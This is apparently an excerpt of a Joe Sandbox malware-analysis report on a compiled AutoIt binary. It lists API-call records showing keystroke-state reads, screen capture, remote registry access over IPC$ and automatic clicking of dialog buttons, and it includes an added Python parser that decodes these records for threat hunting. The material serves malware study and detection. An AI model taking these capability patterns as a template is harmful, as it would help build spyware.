                                                                                • Instruction ID: 40a2b6875399030ccad9ae238373dccda89fe33a5c9fcc44cf6e08f416eb21cc
                                                                                • Instruction Fuzzy Hash: 47518071900659AFDF05CFA1DD85EEEBB7AFF04304F048229F811AB290D730AA05CB61
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00409E36
                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00409E42
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00409E4E
                                                                                • SelectObject.GDI32(00000000,?), ref: 00409E5B
                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00409EAF
                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00409EEB
                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00409F0F
                                                                                • SelectObject.GDI32(00000006,?), ref: 00409F17
                                                                                • DeleteObject.GDI32(?), ref: 00409F20
                                                                                • DeleteDC.GDI32(00000006), ref: 00409F27
                                                                                • ReleaseDC.USER32(00000000,?), ref: 00409F32
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID: (
                                                                                • API String ID: 2598888154-3887548279
                                                                                • Opcode ID: cb2b0105e26507291d1567dee90a7f1529984047ee8c4257119bcbb81f09f6d8
                                                                                • Instruction ID: 2d9060d67c7aa44875013a13a5c12ebb68b72243c59b8ca06621b8a2bf592c4e
                                                                                • Instruction Fuzzy Hash: 6D514771900209AFCB15CFA8D885EAFBBB9EF48710F14842EF95AA7250C735AC41CB94
                                                                                Similarity
                                                                                • API ID: LoadString__swprintf_wprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 2889450990-2391861430
                                                                                • Opcode ID: e641154cec3bd2e0467ffd27a0429c2e8fb81c233228ab0608027821b06ea2a1
                                                                                • Instruction ID: 7bf32f8c2165129f408dea6217a6c9253fbc65b4ba1d12168c03d7c832e44d1e
                                                                                • Instruction Fuzzy Hash: F851AD7290014DBACF16EBE4DE42EEEB778AF04304F100066F6057A5A2EB346F58DB61
                                                                                Similarity
                                                                                • API ID: LoadString__swprintf_wprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 2889450990-3420473620
                                                                                • Opcode ID: c271e65eadb2624aea18ba66a2bfcf3cd70c5b5546e888f35ba17814267fa26a
                                                                                • Instruction ID: c4d5fcefe0ef13ce390ebe0061e651de113932a1414dc83128d22c65f8958b4a
                                                                                • Instruction Fuzzy Hash: 5651AE72900149BACF26EBE4DE42EEEB778AF04344F100066F605764A2EB746F59DF61
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: $EF$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 3964851224-3104496615
                                                                                • Opcode ID: 3f50943c6e2c34fde972eb5cd12c6fc55f4b29856f9d9cb5b87cba21d73d3644
                                                                                • Instruction ID: f287bac6fc14d5b45b03cdb129059cd8a538e5b9d3575f1c56ee4bf735614d17
                                                                                • Instruction Fuzzy Hash: 2741A43010024A9BDF01EF10E852AEB3365FF52301F50885AFC565F2A2EB78EE4ACB15
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F55D7
                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003F5664
                                                                                • GetMenuItemCount.USER32(00471708), ref: 003F56ED
                                                                                • DeleteMenu.USER32(00471708,00000005,00000000,000000F5,?,?), ref: 003F577D
                                                                                • DeleteMenu.USER32(00471708,00000004,00000000), ref: 003F5785
                                                                                • DeleteMenu.USER32(00471708,00000006,00000000), ref: 003F578D
                                                                                • DeleteMenu.USER32(00471708,00000003,00000000), ref: 003F5795
                                                                                • GetMenuItemCount.USER32(00471708), ref: 003F579D
                                                                                • SetMenuItemInfoW.USER32(00471708,00000004,00000000,00000030), ref: 003F57D3
                                                                                • GetCursorPos.USER32(?), ref: 003F57DD
                                                                                • SetForegroundWindow.USER32(00000000), ref: 003F57E6
                                                                                • TrackPopupMenuEx.USER32(00471708,00000000,?,00000000,00000000,00000000), ref: 003F57F9
                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003F5805
                                                                                Similarity
                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 3993528054-0
                                                                                • Opcode ID: 183b095b9ef5aceee841bbe420d245bac4ed487d3eac41c78b7b5ca766ce0249
                                                                                • Instruction ID: 375b6319aa8ae21e86ab4dded1dd61092f50c27b38762313a48b6534f75a17ca
                                                                                • Instruction Fuzzy Hash: BA71D370641A0DBEEB229B54DC89FBABF65FF00368F244215F729AA2E1C7715810DB94
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003EA1DC
                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003EA211
                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003EA22D
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003EA249
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003EA273
                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 003EA29B
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003EA2A6
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003EA2AB
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 1687751970-22481851
                                                                                • Opcode ID: 8d446a71d3a0952fedc6f426c332a371290e81c87ceab10906672e8a5ff1a286
                                                                                • Instruction ID: 18c4f482a83bdd645e27e6a3284ca5baa8a480652a57d0af2a3a88accc0fa03c
                                                                                • Opcode Fuzzy Hash: 8d446a71d3a0952fedc6f426c332a371290e81c87ceab10906672e8a5ff1a286
                                                                                • Instruction Fuzzy Hash: F741F776C10629ABCF26EFA4DC85DEDB778BF04704F01452AE911B71A1EB74AE05CB50
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 003F67FD
                                                                                • __swprintf.LIBCMT ref: 003F680A
                                                                                  • Part of subcall function 003D172B: __woutput_l.LIBCMT ref: 003D1784
                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 003F6834
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 003F6840
                                                                                • LockResource.KERNEL32(00000000), ref: 003F684D
                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 003F686D
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 003F687F
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 003F688E
                                                                                • LockResource.KERNEL32(?), ref: 003F689A
                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003F68F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                • String ID: 5F
                                                                                • API String ID: 1433390588-3653218959
                                                                                • Opcode ID: c44f22a0607a8b1b22e410fe225f088365f0ff84e59558a2b05424db2680c3e2
                                                                                • Instruction ID: 830b8ea12eace129533cbadc7ee303d675f9a8712e774a6f52d302f9badffc39
                                                                                • Opcode Fuzzy Hash: c44f22a0607a8b1b22e410fe225f088365f0ff84e59558a2b05424db2680c3e2
                                                                                • Instruction Fuzzy Hash: 8C31727190025AABDB129FA0ED46EBF7BACFF08381F008429FA16D6150E734D951DB64
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004236F4,00000010,?,Bad directive syntax error,0044DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003F25D6
                                                                                • LoadStringW.USER32(00000000,?,004236F4,00000010), ref: 003F25DD
                                                                                • _wprintf.LIBCMT ref: 003F2610
                                                                                • __swprintf.LIBCMT ref: 003F2632
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003F26A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 1080873982-4153970271
                                                                                • Opcode ID: 2ce3fddee4297369a6ac78e5dd07455a5c75c993932bfcaa6a623f2c8a2d619f
                                                                                • Instruction ID: d679290d801b7f7c89eca276dc486cdb42f2a3eb4c19b3ace14e9184e066da66
                                                                                • Opcode Fuzzy Hash: 2ce3fddee4297369a6ac78e5dd07455a5c75c993932bfcaa6a623f2c8a2d619f
                                                                                • Instruction Fuzzy Hash: E6215E3290021EFFCF12AF90DC4AFEE7739BF18708F040466F6156A1A2EA75A614DB55
                                                                                APIs
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003F7B42
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003F7B58
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F7B69
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003F7B7B
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003F7B8C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: SendString
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 890592661-1007645807
                                                                                • Opcode ID: 7a5b29209b9bb7d3499fdf7270fc474ea5addaf74d3e080435784efeef658fa8
                                                                                • Instruction ID: e67c508de74308e366a9cce1cdcbe1cd50176a5766a79ba31165557bba821323
                                                                                • Opcode Fuzzy Hash: 7a5b29209b9bb7d3499fdf7270fc474ea5addaf74d3e080435784efeef658fa8
                                                                                • Instruction Fuzzy Hash: 8C1104A0A5029D79D721BB61CC4AEFFBB7CEBD2B05F10041AB511A60C1EEA00E45C5B1
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 003F7794
                                                                                  • Part of subcall function 003CDC38: timeGetTime.WINMM(?,76C1B400,004258AB), ref: 003CDC3C
                                                                                • Sleep.KERNEL32(0000000A), ref: 003F77C0
                                                                                • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003F77E4
                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 003F7806
                                                                                • SetActiveWindow.USER32 ref: 003F7825
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003F7833
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 003F7852
                                                                                • Sleep.KERNEL32(000000FA), ref: 003F785D
                                                                                • IsWindow.USER32 ref: 003F7869
                                                                                • EndDialog.USER32(00000000), ref: 003F787A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                • Opcode ID: 7c1516040415c1660af59e6397dc5f1162f6b168fda6fc9686275f9822bc10ee
                                                                                • Instruction ID: ad328fe11ba9ae09fa9d9cb7fb524886e4f715be47633e7693d6b924f1f9de7a
                                                                                • Opcode Fuzzy Hash: 7c1516040415c1660af59e6397dc5f1162f6b168fda6fc9686275f9822bc10ee
                                                                                • Instruction Fuzzy Hash: 65214270604209AFE7125F20EC89B363F6AFB44346F001434FA09861B2DB719D54EB29
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • CoInitialize.OLE32(00000000), ref: 0040034B
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004003DE
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 004003F2
                                                                                • CoCreateInstance.OLE32(0043DA8C,00000000,00000001,00463CF8,?), ref: 0040043E
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004004AD
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00400505
                                                                                • _memset.LIBCMT ref: 00400542
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040057E
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004005A1
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004005A8
                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004005DF
                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 004005E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                • String ID:
                                                                                • API String ID: 1246142700-0
                                                                                • Opcode ID: a8dd4a00ada15ab8a1a35e3be5e64acaef7b89c290dcec4ab4c64838b48e888c
                                                                                • Instruction ID: d0430385b8fa0884578a81f65cfa6fb62451f0476d7a60a7bbf3b6a5c6bce2b3
                                                                                • Opcode Fuzzy Hash: a8dd4a00ada15ab8a1a35e3be5e64acaef7b89c290dcec4ab4c64838b48e888c
                                                                                • Instruction Fuzzy Hash: 58B1EA75A00208AFDB15DFA4C889EAEBBB9FF48304F14846AF905EB251DB34ED41CB54
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 003F2ED6
                                                                                • SetKeyboardState.USER32(?), ref: 003F2F41
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 003F2F61
                                                                                • GetKeyState.USER32(000000A0), ref: 003F2F78
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 003F2FA7
                                                                                • GetKeyState.USER32(000000A1), ref: 003F2FB8
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 003F2FE4
                                                                                • GetKeyState.USER32(00000011), ref: 003F2FF2
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 003F301B
                                                                                • GetKeyState.USER32(00000012), ref: 003F3029
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 003F3052
                                                                                • GetKeyState.USER32(0000005B), ref: 003F3060
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 76896e48e8487ee1bc4d1a55d354cdc7006111491c0046abe7b8701c51a2e401
                                                                                • Instruction ID: 174d92d2669a51755b7897441b231e043e35813ae0218ab9274b92f0b37d35d2
                                                                                • Opcode Fuzzy Hash: 76896e48e8487ee1bc4d1a55d354cdc7006111491c0046abe7b8701c51a2e401
                                                                                • Instruction Fuzzy Hash: 4151C760A0478C69FB37DBA488107FBBBB49F11340F09459ED7C25A1C2DA549B8CC762
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000001), ref: 003EED1E
                                                                                • GetWindowRect.USER32(00000000,?), ref: 003EED30
                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003EED8E
                                                                                • GetDlgItem.USER32(?,00000002), ref: 003EED99
                                                                                • GetWindowRect.USER32(00000000,?), ref: 003EEDAB
                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003EEE01
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 003EEE0F
                                                                                • GetWindowRect.USER32(00000000,?), ref: 003EEE20
                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003EEE63
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 003EEE71
                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003EEE8E
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 003EEE9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                • Opcode ID: 2c65c3f2fcda7073c1b659da5df0c50f2fa00c0c6d9eaf4fea4b2d41eb8f4002
                                                                                • Instruction ID: d77a7e2536c514c39afb48d1db70e02f21fa30d2ef0b42c15d37a6fce131cc7f
                                                                                • Opcode Fuzzy Hash: 2c65c3f2fcda7073c1b659da5df0c50f2fa00c0c6d9eaf4fea4b2d41eb8f4002
                                                                                • Instruction Fuzzy Hash: 76510FB1B00605AFDB19CF69DD86AAEBBBAFB88701F158239F519D72D0D7709D008B14
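The function records above (the registry CLSID lookup, the resource/icon loader, the AutoIt error MessageBox, the mciSendString player, the BUTTON/BM_CLICK dialog closer, the keyboard-state reader, the dialog-layout code) are the AutoIt runtime that the report's "Binary is likely a compiled AutoIt script file" signature refers to, not FormBook itself; what is worth keeping from them for hunting are the exact-match fields (API ID, String ID, Instruction Fuzzy Hash) and the decoded constants. The following parser is an added example written for this page, not Joe Sandbox code: it reads records in the layout shown above, splits each "• API.MODULE(args), ref: ADDR" line into fields, decodes the Win32 constants that appear in these records (0xF5 = BM_CLICK, 0x10 = WM_CLOSE, 0x80000002 = HKEY_LOCAL_MACHINE, 0x20019 = KEY_READ, the VK_* codes), and flags the "find a BUTTON child, send it BM_CLICK" dialog-dismiss shape. The constant tables, the `matches_dialog_autoclick` heuristic and the sample text are my own assumptions; the sample is constructed from the record shapes on this page.

```python
"""Parse Joe Sandbox 'APIs' function records into structured data.

Added example, not part of the Joe Sandbox report. SAMPLE below is constructed
from the record layout on this page; the constant tables are ordinary Win32
values and the dialog-autoclick check is a hunting heuristic of my own.
"""
import re
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout (bullets, 'ref:' addresses).
SAMPLE = r"""APIs
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 003F7806
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003F7833
• SendMessageW.USER32(00000010,00000000,00000000), ref: 003F7852
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• Instruction Fuzzy Hash: 65214270604209AFE7125F20EC89B363F6AFB44346F001434FA09861B2DB719D54EB29
APIs
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003EA22D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003EA249
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• Instruction Fuzzy Hash: F741F776C10629ABCF26EFA4DC85DEDB778BF04704F01452AE911B71A1EB74AE05CB50
"""

# "• Name.MODULE(args), ref: ADDR"; CRT entries ("__swprintf.LIBCMT ref: ...")
# carry no argument list and no comma, so both are optional.
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s+)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(
    r"^•\s+(?P<key>API ID|String ID|API String ID|Instruction Fuzzy Hash|Opcode Fuzzy Hash):\s*(?P<val>.*)$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall: bool


@dataclass
class FuncRecord:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)


def parse_records(text: str) -> list[FuncRecord]:
    """Each 'APIs' heading opens a new record; bullets under it are calls or fields."""
    records: list[FuncRecord] = []
    current: FuncRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FuncRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(m["api"], m["module"], args, m["ref"].upper(),
                                         line.startswith("• Part of subcall")))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["val"].strip()
    return records


WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x00F5: "BM_CLICK"}
VIRTUAL_KEYS = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
REG_ROOTS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
REG_ACCESS = {0x20019: "KEY_READ"}

# (api, argument index, expected argument count or None) -> lookup table.
# The report sometimes lists fewer or more stack slots than the real prototype,
# so a decoder only fires when the count matches (or is unconstrained).
DECODERS = {
    ("SendMessageW", 1, 4): WINDOW_MESSAGES,
    ("GetAsyncKeyState", 0, 1): VIRTUAL_KEYS,
    ("GetKeyState", 0, 1): VIRTUAL_KEYS,
    ("RegConnectRegistryW", 1, 3): REG_ROOTS,
    ("RegOpenKeyExW", 3, None): REG_ACCESS,
}


def decode_constants(call: ApiCall) -> dict[int, str]:
    """Map argument positions of a call to symbolic names where the value is known."""
    out: dict[int, str] = {}
    for (api, idx, count), table in DECODERS.items():
        if call.api != api or idx >= len(call.args):
            continue
        if count is not None and len(call.args) != count:
            continue
        try:
            value = int(call.args[idx], 16)
        except ValueError:  # '?' or a string literal such as BUTTON
            continue
        if value in table:
            out[idx] = table[value]
    return out


def matches_dialog_autoclick(rec: FuncRecord) -> bool:
    """Heuristic: locates a BUTTON child window and sends it BM_CLICK."""
    finds_button = any(c.api == "FindWindowExW" and "BUTTON" in c.args for c in rec.calls)
    clicks = any(decode_constants(c).get(1) == "BM_CLICK" for c in rec.calls if c.api == "SendMessageW")
    return finds_button and clicks


def hunting_keys(rec: FuncRecord) -> dict[str, str]:
    """Fields that can be matched exactly against other reports."""
    return {k: rec.fields[k] for k in ("API ID", "String ID", "Instruction Fuzzy Hash") if k in rec.fields}
```

Run it over a saved report page to get one `FuncRecord` per function; the `Instruction Fuzzy Hash` and `API ID` values are what to pivot on when checking whether another sample carries the same AutoIt runtime build, while the decoded constants make the call lists readable without a header file at hand.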
                                                                                APIs
                                                                                  • Part of subcall function 003CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003CB759,?,00000000,?,?,?,?,003CB72B,00000000,?), ref: 003CBA58
                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003CB72B), ref: 003CB7F6
                                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,003CB72B,00000000,?,?,003CB2EF,?,?), ref: 003CB88D
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0042D8A6
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003CB72B,00000000,?,?,003CB2EF,?,?), ref: 0042D8D7
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003CB72B,00000000,?,?,003CB2EF,?,?), ref: 0042D8EE
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003CB72B,00000000,?,?,003CB2EF,?,?), ref: 0042D90A
                                                                                • DeleteObject.GDI32(00000000), ref: 0042D91C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
